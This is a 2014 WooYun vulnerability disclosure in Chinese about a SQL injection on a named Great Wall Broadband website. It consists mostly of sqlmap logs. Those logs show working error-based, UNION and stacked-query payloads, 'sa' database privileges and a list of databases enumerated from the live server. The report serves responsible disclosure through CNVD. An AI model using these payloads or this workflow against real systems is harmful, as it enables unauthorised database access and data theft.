当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-060953

漏洞标题:某省长城宽带sql注入之第二弹(sa权限,跨呀跨库啊,可拿wenshell)

相关厂商:长城宽带

漏洞作者: Mosuan

提交时间:2014-05-16 18:42

修复时间:2014-06-30 18:47

公开时间:2014-06-30 18:47

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-16: 细节已通知厂商并且等待厂商处理中
2014-05-21: 厂商已经确认,细节仅向厂商公开
2014-05-31: 细节向核心白帽子及相关领域专家公开
2014-06-10: 细节向普通白帽子公开
2014-06-20: 细节向实习白帽子公开
2014-06-30: 细节向公众公开

简要描述:

呵呵

详细说明:

wooyun大大速度审核洞吧,其实白帽子跟你一样辛苦,就比如我半夜还在挖洞.....明天九点上班....请叫我超人......
注入点

http://www.gwbn.cq.cn/service.asp?articleid=628&type=new


sa权限

注入地址:http://www.gwbn.cq.cn/service.asp?articleid=628&type=new
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 01:19:30
[01:19:31] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.gwbn.cq.cn\session' as session file
[01:19:31] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from sessio
n file
[01:19:31] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: articleid
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: articleid=628 AND 5982=CONVERT(INT,(CHAR(58)+CHAR(112)+CHAR(112)+CH
AR(110)+CHAR(58)+(SELECT (CASE WHEN (5982=5982) THEN CHAR(49) ELSE CHAR(48) END)
)+CHAR(58)+CHAR(118)+CHAR(99)+CHAR(110)+CHAR(58)))&type=new
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: articleid=-3736 UNION SELECT CHAR(58)+CHAR(112)+CHAR(112)+CHAR(110)
+CHAR(58)+CHAR(75)+CHAR(104)+CHAR(100)+CHAR(73)+CHAR(107)+CHAR(87)+CHAR(76)+CHAR
(118)+CHAR(115)+CHAR(115)+CHAR(58)+CHAR(118)+CHAR(99)+CHAR(110)+CHAR(58)-- &type
=new
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: articleid=628; WAITFOR DELAY '0:0:5';--&type=new
---
[01:19:31] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[01:19:31] [INFO] fetching current user
current user: 'sa'
[01:19:32] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.gwbn.cq.cn'
[*] shutting down at 01:19:32


跨库

注入地址:http://www.gwbn.cq.cn/service.asp?articleid=628&type=new
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 01:16:37
[01:16:37] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.gwbn.cq.cn\session' as session file
[01:16:37] [INFO] testing connection to the target url
[01:16:38] [INFO] testing if the url is stable, wait a few seconds
[01:16:40] [INFO] url is stable
[01:16:40] [INFO] testing if GET parameter 'articleid' is dynamic
[01:16:41] [WARNING] GET parameter 'articleid' appears to be not dynamic
[01:16:41] [INFO] heuristics detected web page charset 'GB2312'
[01:16:41] [INFO] heuristic test shows that GET parameter 'articleid' might be i
njectable (possible DBMS: Microsoft SQL Server)
[01:16:41] [INFO] testing sql injection on GET parameter 'articleid'
[01:16:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
parsed error message(s) showed that the back-end DBMS could be Microsoft SQL Ser
ver. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[01:16:53] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[01:16:53] [INFO] GET parameter 'articleid' is 'Microsoft SQL Server/Sybase AND
error-based - WHERE or HAVING clause' injectable
[01:16:53] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:17:53] [INFO] GET parameter 'articleid' is 'Microsoft SQL Server/Sybase stac
ked queries' injectable
[01:17:53] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:17:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:17:55] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for UNION query injection technique
[01:18:27] [CRITICAL] connection timed out to the target url or proxy, sqlmap is
going to retry the request
[01:18:27] [WARNING] most probably web server instance hasn't recovered yet from
previous timed based payload. If the problem persists please wait for few minut
es and rerun without flag T in option '--technique' (e.g. --flush-session --tech
nique=BEUS) or try to lower the value of option '--time-sec' (e.g. --time-sec=2)
[01:18:28] [INFO] target url appears to have 1 columns in query
[01:18:29] [INFO] GET parameter 'articleid' is 'Generic UNION query (NULL) - 1 t
o 10 columns' injectable
GET parameter 'articleid' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] y
[01:18:33] [INFO] testing if GET parameter 'type' is dynamic
[01:18:33] [WARNING] GET parameter 'type' appears to be not dynamic
[01:18:34] [WARNING] heuristic test shows that GET parameter 'type' might not be
injectable
[01:18:34] [INFO] testing sql injection on GET parameter 'type'
[01:18:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:18:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[01:18:49] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:18:52] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:18:57] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:18:58] [WARNING] if UNION based SQL injection is not detected, please consid
er usage of option '--union-char' (e.g. --union-char=1) and/or try to force the
back-end DBMS (e.g. --dbms=mysql)
[01:19:02] [WARNING] GET parameter 'type' is not injectable
sqlmap identified the following injection points with a total of 57 HTTP(s) requ
ests:
---
Place: GET
Parameter: articleid
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: articleid=628 AND 5982=CONVERT(INT,(CHAR(58)+CHAR(112)+CHAR(112)+CH
AR(110)+CHAR(58)+(SELECT (CASE WHEN (5982=5982) THEN CHAR(49) ELSE CHAR(48) END)
)+CHAR(58)+CHAR(118)+CHAR(99)+CHAR(110)+CHAR(58)))&type=new
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: articleid=-3736 UNION SELECT CHAR(58)+CHAR(112)+CHAR(112)+CHAR(110)
+CHAR(58)+CHAR(75)+CHAR(104)+CHAR(100)+CHAR(73)+CHAR(107)+CHAR(87)+CHAR(76)+CHAR
(118)+CHAR(115)+CHAR(115)+CHAR(58)+CHAR(118)+CHAR(99)+CHAR(110)+CHAR(58)-- &type
=new
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: articleid=628; WAITFOR DELAY '0:0:5';--&type=new
---
[01:19:02] [INFO] testing Microsoft SQL Server
[01:19:03] [INFO] confirming Microsoft SQL Server
[01:19:05] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[01:19:05] [INFO] fetching database names
[01:19:06] [INFO] the SQL query used returns 7 entries
[01:19:07] [INFO] retrieved: "master"
[01:19:08] [INFO] retrieved: "model"
[01:19:08] [INFO] retrieved: "msdb"
[01:19:09] [INFO] retrieved: "ReportServer"
[01:19:10] [INFO] retrieved: "ReportServerTempDB"
[01:19:11] [INFO] retrieved: "tempdb"
[01:19:12] [INFO] retrieved: "WebSite#DataSQL"
available databases [7]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] WebSite#DataSQL
[01:19:12] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 17 times
[01:19:12] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.gwbn.cq.cn'

漏洞证明:

详细说明

修复方案:

过滤

版权声明:转载请注明来源 Mosuan@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-05-21 15:01

厂商回复:

CNVD确认并复现所述情况,已经由CNVD直接转发给长城宽带houxingze<houxingze圈a > 处置。

最新状态:

暂无